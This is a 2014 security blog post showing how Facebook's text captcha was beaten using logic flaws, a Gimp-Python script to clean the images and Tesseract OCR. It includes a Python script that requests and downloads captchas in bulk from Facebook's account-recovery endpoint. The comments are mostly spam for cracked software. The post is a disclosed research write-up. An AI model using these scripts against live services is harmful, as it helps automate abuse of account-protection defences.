Thursday 10 July 2014

How to Bypass Facebook's Text Captcha

In this post I'll discuss Facebook's text captcha and how to bypass it with a little Gimp-Fu image cleaning and Tesseract OCR. The techniques below build on previous work where I demonstrated how to bypass Bugcrowd's captcha.


The Facebook Captcha(s)

I've seen Facebook use two captchas. The first is the friend photo captcha, where you are required to select your friends in pictures. This one seemed hard to bypass (except when you attack your friend's account and know all of their friends).


The second type is the text-based captcha, where you just enter the letters/numbers shown in the image. Something like this:


Let's look at some ways to bypass the text captcha :)


A couple of logic flaws...

My original aim was to focus on OCR with Tesseract but it turns out the captcha had logic flaws as well.

Issue #1 - When entering the captcha not all of the characters needed to be correct. If you got one character wrong it would still be accepted.

Issue #2 - The captcha check is case insensitive. Despite using uppercase and lowercase letters in the captcha images, the server didn't actually verify the case of user input.

Issue #3 - Captcha repetition...


Each captcha should have contained a dynamically generated string randomly chosen from a pool of 62^7 possibilities. For some reason though I encountered repetition. This is obviously very bad as with a limited set of captchas an attacker can just download every image, solve them all and achieve a 100% bypass rate in the future. I have no idea what the cause of this issue was and Facebook didn't release any details.

The logic flaws were interesting but let's not forget OCR as well!


Back to the image...

Let's take a look at a Facebook captcha image:


When thinking about OCR analysis there's some things to note:
  • Letters/numbers themselves are clearly displayed in black - Good
  • Minimal overlaying, wiggling and distortion is used - Good
  • Black scribbles add noise to the background - Bad
  • White scribbles effectively remove pixels from the characters - Bad
I did some testing with Tesseract and found noise, image size, character size and spacing all had a big impact on the accuracy of results. For example, directly analysing the image above will return invalid characters or no response at all. To improve Tesseract results I needed some way to get rid of the noise and repair damaged characters.


Step #1 Cleaning 

I chose to use Gimp for my image cleaning as it was a program I was familiar with and it offered command line processing with Python. While the documentation (here and here) and debugging aren't too good, it gets the job done.

So first up I loaded the image and increased its size, I found processing a smaller image was less accurate and would reduce the quality of the final image.
#Load image
image = pdb.gimp_file_load(file, file)
drawable = pdb.gimp_image_get_active_layer(image)
#Double image size
pdb.gimp_image_scale(image,560,142)

Next I removed the background noise. By selecting by black and then shrinking the selection, the thin black lines would be unselected, leaving just the black letters. To actually paint over the noise I just had to re-grow my selection, invert and paint white.
#Select by color black
pdb.gimp_by_color_select(drawable,"#000000",20,2,0,0,0,0)
#Shrink selection by 1 pixel
pdb.gimp_selection_shrink(image,1)
#Grow selection by 2 pixels
pdb.gimp_selection_grow(image,2)
#Fill black
pdb.gimp_context_set_foreground((0,0,0))
pdb.gimp_edit_fill(drawable,0)
pdb.gimp_edit_fill(drawable,0)
pdb.gimp_edit_fill(drawable,0)
#Invert selection
pdb.gimp_selection_invert(image)
#Fill white
pdb.gimp_context_set_foreground((255,255,255))
pdb.gimp_edit_fill(drawable,0)

With the outside black noise removed I inverted again to reselect the letters/numbers then translated up and down, painting after each translation. This helped fill in the white lines that in general streaked horizontally through the black characters.
#Invert selection
pdb.gimp_selection_invert(image)
pdb.gimp_context_set_foreground((0,0,0))
#Translate selection up 4 pixels and paint
pdb.gimp_selection_translate(image,0,4)
pdb.gimp_edit_fill(drawable,0)
#Translate selection down 10 pixels and paint
pdb.gimp_selection_translate(image,0,-10)
pdb.gimp_edit_fill(drawable,0)

With the processing done I resized the image back to its original size and saved it.
#Resize image
pdb.gimp_image_scale(image,280,71)
#Export
pdb.gimp_file_save(image, drawable, file, file)
pdb.gimp_image_delete(image)

I've included the full script at the bottom of this post. I ran it with the following command:
gimp-console-2.8.exe -i -b "(python-clean RUN-NONINTERACTIVE \"test.png\")" -b "(gimp-quit 0)"

As an example, cleaning the image above I got this:



Step #2 Submitting to Tesseract

With the image now cleaned it was ready for Tesseract. To improve the accuracy of results I selected the single word mode (-psm 8) and used a custom character set (nobatch fb).
tesseract.exe test.jpg output -psm 8 nobatch fb

I created the fb character set in "C:\Program Files (x86)\Tesseract-OCR\tessdata\configs", it contained the following whitelist:
tessedit_char_whitelist abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ1234567890


Step #3 Automate everything with Python

I didn't bother to build a fully working POC to automate a real attack - I'm leaving this step as homework for you guys, best script wins $1 via Paypal ;) (I am of course joking don't actually do this!)

Theoretically though if you did want to build a fully functioning script you'd just need to take the python script from my Bugcrowd post and cleaning script from this post, combine and pwn.

Also the following can be used to download Facebook captchas after you have triggered the Facebook defenses:
from urllib.error import *
from urllib.request import *
from urllib.parse import *
import re
import subprocess

def getpage():
    try:
        print("[+] POSTing to fb");
        params = {'lsd':'AVrQ4y7A', 'email':'09262073366', 'did_submit':'Search', '__user':'0', '__a':'1', '__dyn':'7wiUdp87ebG58mBWo', '__req':'p','__rev':'1114696','captcha_persist_data':'abc','recaptcha_challenge_field':'','captcha_response':'abc','confirmed':'1'}
        data = urlencode(params).encode('utf-8')
        request = Request("https://www.facebook.com/ajax/login/help/identify.php?ctx=recover")
        request.add_header('Cookie', 'locale=en_GB;datr=Ku2xUhSA3kShtkMud0JXRHCY; reg_fb_gate=https%3A%2F%2Fwww.facebook.com%2F%3Fstype%3Dlo%26jlou%3DAfco_1iUuf5XPNAuu9SBYhFnEoJfgxIw_9vwHlTfaTRjGB2Ac4VOSLHb018RjcLg3JVRsiY-sQlRSM00X59eKhLh5SJGHltQ0hEQ2WAiRR9A_g%26smuh%3D28853%26lh%3DAc-vs8zSU-_-6kh2%26aik%3Dqh9ABV52OPB3zXxCyUTNXw;')
        #Send request and analyse response
        f = urlopen(request, data)
        response = f.read().decode('utf-8')
        global ccode
        ccode = re.findall('[a-z0-9-]{43}', response)
        global chash
        chash = re.findall('[a-zA-Z0-9_-]{814}', response)
        print("[+] Parsed response");
    except URLError as e:
        print ("*****Error: Cannot retrieve URL*****");

def getcaptcha(i):
    try:
        print("[+] Downloading Captcha");
        captchaurl = "https://www.facebook.com/captcha/tfbimage.php?captcha_challenge_code="+ccode[0]+"&captcha_challenge_hash="+chash[1]
        urlretrieve(captchaurl,'fbcap'+str(i)+'.png')
    except URLError as e:
        print ("*****Error: Cannot retrieve URL*****");

print("[+] Start!");
for i in range(0, 1000):
    #Download page and parse data
    getpage();
    #Download captcha image
    getcaptcha(i);
print("[+] Finished!");



Final Results

So I guess you're wondering, how accurate was Tesseract? Well on a sample of 50 captchas that had been cleaned with Gimp, Tesseract was able to analyse them 100% correctly about 20% of the time. However taking into account the logic flaws the actual pass rate jumped to 50%.

Some example results:


It's quite impressive seeing how well both the Gimp cleaning and Tesseract analysis performed. Although you can also see how even subtle changes in the initial image can significantly affect both cleaning output and final analysis.


Facebook Fix #1

After reporting these issues the captcha repetition was addressed pretty quickly. The other logic flaws were left unchanged. The image itself was modified to make the characters/noise thicker:


Unfortunately this had little effect on the captcha strength as it's the noise to character relative thickness that mattered not the absolute thickness. Making the noise thicker and characters thinner, would have prevented noise removal through selection shrinking.


Final Thoughts

Another day, another captcha bypass. Whether you use Tesseract or a bad-ass custom neural network like Google or Vicarious, text captchas can be bypassed with relative ease. I managed a 20% pass-rate, I'm sure with a better cleaning process and/or Tesseract training this could be pushed a lot higher. It's time to ditch that text captcha.

Facebook said that right now the captcha is used more as a mechanism to slow down attacks as opposed to stopping attacks completely. The captcha will eventually be fixed but there are no plans at the moment.

Shout out to Facebook security for their help looking into this issue. Thanks for reading. Questions and comments are always appreciated, just leave a message below.

Pwndizzle out


############################################
#Gimp-Fu cleaning script, based on stackoverflow script here:
#http://stackoverflow.com/questions/12662676/writing-a-gimp-python-script?rq=1

from gimpfu import pdb, main, register, PF_STRING

def clean(file):
    #Load image
    image = pdb.gimp_file_load(file, file)
    drawable = pdb.gimp_image_get_active_layer(image)
    #Double image size
    pdb.gimp_image_scale(image,560,142)
    #Select by color black
    pdb.gimp_by_color_select(drawable,"#000000",20,2,0,0,0,0)
    #Shrink selection by 1 pixel
    pdb.gimp_selection_shrink(image,1)
    #Grow selection by 2 pixels
    pdb.gimp_selection_grow(image,2)
    #Fill black
    pdb.gimp_context_set_foreground((0,0,0))
    pdb.gimp_edit_fill(drawable,0)
    pdb.gimp_edit_fill(drawable,0)
    pdb.gimp_edit_fill(drawable,0)
    #Invert selection
    pdb.gimp_selection_invert(image)
    #Fill white
    pdb.gimp_context_set_foreground((255,255,255))
    pdb.gimp_edit_fill(drawable,0)
    #Invert selection
    pdb.gimp_selection_invert(image)
    pdb.gimp_context_set_foreground((0,0,0))
    #Translate selection up 4 pixels and paint
    pdb.gimp_selection_translate(image,0,4)
    pdb.gimp_edit_fill(drawable,0)
    #Translate selection down 10 pixels and paint
    pdb.gimp_selection_translate(image,0,-10)
    pdb.gimp_edit_fill(drawable,0)
    #Resize image
    pdb.gimp_image_scale(image,280,71)
    #Export
    pdb.gimp_file_save(image, drawable, file, file)
    pdb.gimp_image_delete(image)

args = [(PF_STRING, 'file', 'GlobPattern', '*.*')]
register('python-clean', '', '', '', '', '', '', '', args, [], clean)

main()

############################################

28 comments:

  1. this is a great deduction.

    ReplyDelete
  2. Hi,

    Your gimp script is no more remove all the disturbance from the image. I am creating facebook captha reader. Would you help me in this?

    ReplyDelete
  3. Your gimp script is no more remove all the disturbance from the image. I am creating facebook captha reader. Would you help me in this?
    Reply

    ReplyDelete
  4. Unfortunately I'm busy with other work right now. Don't give up though, filtering should be able to help with a lot of different captcha variations :)

    ReplyDelete
  5. I should say only that its awesome! The blog is informational and always produce amazing things.
    facebook

    ReplyDelete
  6. I really appreciate the information that you have shared on your Blog. Thanks for shearing this blog.
    Norton.com/setup

    ReplyDelete
  7. Thanks for this wonderful and vital informatio
    that was posted. However,
    reading your content
    was nice because it's has ease flesch reading and
    will arranged with easy solution.

    ReplyDelete
  8. Corel Draw x7 Full Crack 2022 With Activation Code Full Version Download CLICK HERE TO DOWNLOAD Corel Draw x7 Full Crack is a vector-based definitely photographs editor software program application utility that’s used to create photographs, logos, invitation playing gambling playing cards in addition to flexes. The interface of this photo-improving software program application utility is straightforward and man or woman-friendly.


    vMix Crack Software is a video mixing and switching software that takes advantage of the latest features in hardware to enable live HD video mixing. Moreover, a task previously only possible on dedicated and expensive hardware mixers. In addition, This software is an entire stay video manufacturing software program answer with capabilities inclusive of LIVE blending, switching, recording, and LIVE streaming of SD, complete HD,

    EDRAW MAX is a helpful flowchart plan application that permits you to envision your thoughts! With this Professional tool, clients, for example, understudies, instructors, and business professionals can dependably make and distribute different sorts of outlines to speak to thought Free formats! It empowers understudies to make and distribute an assortment of graphs for understudies, educators, and business visionaries to certainly speak to any stunning thoughts

    ReplyDelete
  9. Corel Draw x7 Full Crack 2022 With Activation Code Full Version Download CLICK HERE TO DOWNLOAD Corel Draw x7 Full Crack is a vector-based definitely photographs editor software program application utility that’s used to create photographs, logos, invitation playing gambling playing cards in addition to flexes. The interface of this photo-improving software program application utility is straightforward and man or woman-friendly.

    AV Voice Changer Software Diamond Patch is beneficial for customers who need to be the Voice Master of Media in cyberspace. They can use it to have amusing whilst chatting the usage of immediately messenger programs, do voice dubbing and voice-overs for his or her very own video/audio clips, mimic the voice in their preferred Idol.

    Euro Truck Simulator Crack With Keygen comes as a single-participant without qualification mode to apply the excellent preview in your paintings and jogging. This recreation became launched in 2012 and regarded round similarly. If you’ve got quite a few records approximately the sorts of equipment and units of European and European paintings. Euro Truck Simulator three Activation Key List Download.

    ReplyDelete
  10. Hi....
    Simple CAPTCHAs can be bypassed using the Optical Character Recognition (OCR) technology that recognizes the text inside images, such as scanned documents and photographs. This technology converts images containing written text into machine-readable text data.
    You are also read more Online Business Loan in India

    ReplyDelete
  11. Thanks for sharing this information here. It seems really very informative.

    tv.youtube.com/start/roku | roku com link | roku.com/link

    ReplyDelete
  12. Getting worried about your Roku activation issue? Talk to our experts to activate your Roku through the live chat process. Our team of experts is 24/7 available to help you. Roku link code is nothing but the Roku activation code that you need to feed in Roku.com/link. Get in touch with us for more information.
    tv.youtube.com/start/roku | roku com link

    ReplyDelete
  13. I think this post is very informative and helpful. I have to add this to my collection. You did a great job! Very good article. Based on your previous post Improve your aim, I also wrote an in-depth article. You may be interested in reading this article click counter. Thanks for visiting.

    ReplyDelete
  14. While looking for playing outdoors these days, it was very difficult as most of the children are addicted to smartphones. Addiction to smartphones has come like a big headache for the parents, they need to find a way to grab the childrens attention away from phones and have a healthy habits which benefits their physical and mental health. This is where kids ride on cars has become one of the popular toys among the kids to play and have fun.
    The kids electric cars will help to come out and play outdoors due to their look alike real cars making the children more enthusiastic and fascinated to play with those toys. The parents can operate the electric rideons with the help of a remote control and hence the children can enjoy the ride while they are thinking like a real riders sitting in the car and having lots of joy and happiness. However, these toys comes in a bit pricy compared to normal toys which are under a 30 dollars price, while these toys costs close to 100 to 200 pounds in general based on the model and specifications of the car. Check here for best rideons.
    While there are high end models like off-road electric cars which are for big kids and come with a battery of 24V making them more powerful and fits perfectly to ride for the age above 8 years old. Thus these kinds of cars are helping the children to move away from the phones and enjoy the outdoors which will help for physical exercise and improve their health as well.
    Also there are Licensed kids electric cars in the segments where the big brands like BMW, Ford, Audi, Lamborghini, Mercedes etc type real world cars are being made in a tiny cars which attracts children so much towards these little rideons. Especially girl child can prefer pink color lamborghini cars if they are fascinated about the sports cars and the boys can choose whatever car model they have interest in. Thus you can purchase a good rideon car for your kid and improve their Joy further.

    ReplyDelete
  15. Forex Factory Calendar can be described as the best convenient and accurate calendar that keeps the track of news related to Forex. After this guide, you’ll be able to utilize the calendar and how interpret it in a manner that can benefit your trading.

    ReplyDelete
  16. Amazon Specialist having experties in buisnes growth and ow to scale a brand on amazon

    ReplyDelete
  17. A test engineer is a specialist that makes programming test models utilizing systems, techniques, practices, cycles, and strategies.
    A test engineer is an expert who chooses how to plan a methodology that would most really test a particular item in assembling and related disciplines to guarantee that the item consents to pertinent determinations. Driving the testing group is the obligation of the product test supervisor. The Test Director is a critical individual from the group>> freelance automation testing

    ReplyDelete
  18. Business Loan Leads & MCA Leads or Merchant cash advance brokers generate the leads and loans for customers who require Capital and can’t reach the banks. We made the work simple and smooth for you and our customers by providing Real-Time Merchant Cash Advance Leads. With our connected ownership involvement and the marketing products used within our businesses, we use innovative methods to reserve the attention of Small Business Owners across the United States. Visit Our Website MCA Live Transfer Leads

    ReplyDelete
  19. 私はいつもあなたのブログ投稿を楽しく読んでいます。複雑なトピックに命を吹き込む方法に感謝しています。 ヒッティングゲームについてのプロフィールを紹介したいと思います。このゲームでは、クリックの背後にある科学と、それが私たちの脳と体にどのように影響するかを探っています。 クリックの速さをより深く理解できる、魅力的な読み物です。

    ReplyDelete
  20. "Hello,c.WE PROVIDE Logo design services online

    My expertise lies in conducting comprehensive website audits, keyword research, on-page optimization, content development, link building, and tracking performance metrics to ensure continuous improvement. I stay updated with the latest trends and algorithms in search engine optimization, enabling me to develop effective strategies that align with search engine guidelines and deliver long-term results.srNaW?w2#eZrpSs

    Having worked with diverse clients across various industries, I have a proven track record of increasing organic traffic, boosting conversion rates, and maximizing ROI. I believe in a holistic approach to SEO that combines technical optimization, content relevance, and user experience to create a strong online presence for my clients.

    As an SEO expert, I am skilled in utilizing industry-leading tools and analytics platforms to gather insights, analyze data, and make data-driven decisions. I am also proficient in implementing SEO best practices across various content management systems and staying up to date with the latest trends in search engine marketing.

    I am passionate about collaborating with businesses, understanding their unique goals, and tailoring SEO strategies that deliver tangible results. By continuously monitoring and adapting to changes in search engine algorithms, I strive to provide my clients with a competitive edge in the digital landscape.


    Please note that you can modify and personalize this bio according to your specific expertise, experience, and achievements.

    ReplyDelete
  21. Thanks for sharing this helpful and informative article. Online six sigma course

    ReplyDelete